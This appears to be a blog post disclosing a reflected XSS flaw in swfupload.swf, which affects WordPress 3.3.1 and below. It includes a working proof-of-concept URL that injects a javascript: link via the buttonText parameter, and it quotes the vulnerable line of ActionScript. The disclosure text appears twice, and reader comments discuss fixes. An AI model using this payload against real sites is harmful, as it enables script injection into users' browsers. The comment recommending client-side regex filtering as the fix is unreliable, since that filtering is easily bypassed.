Hi,
Just want to share my finding,
I found another XSS Vulnerability in swfupload.swf
PoC:
http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E
Vulnerable Parameter:
buttonText
Vulnerable Code:
this.buttonTextField.htmlText = this.buttonText;
(For Wordpress Fans, Works on Version 3.3.1 and below)
Enjoy...
Just want to share my finding,
I found another XSS Vulnerability in swfupload.swf
PoC:
http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E
Vulnerable Parameter:
buttonText
Vulnerable Code:
this.buttonTextField.htmlText = this.buttonText;
(For Wordpress Fans, Works on Version 3.3.1 and below)
Enjoy...
3 comments:
Nice one!
How would you go about fixing this?
I don't see that AS3 provides a way to not render HTML in a textField. In AS2 there was a .html configuration boolean property, but it seems to have disappeared. I had hoped assigning to .text would do it, but no luck.
Use Regex (Client Side), Block malicious input,
For example:
<,>, etc...
:)
Post a Comment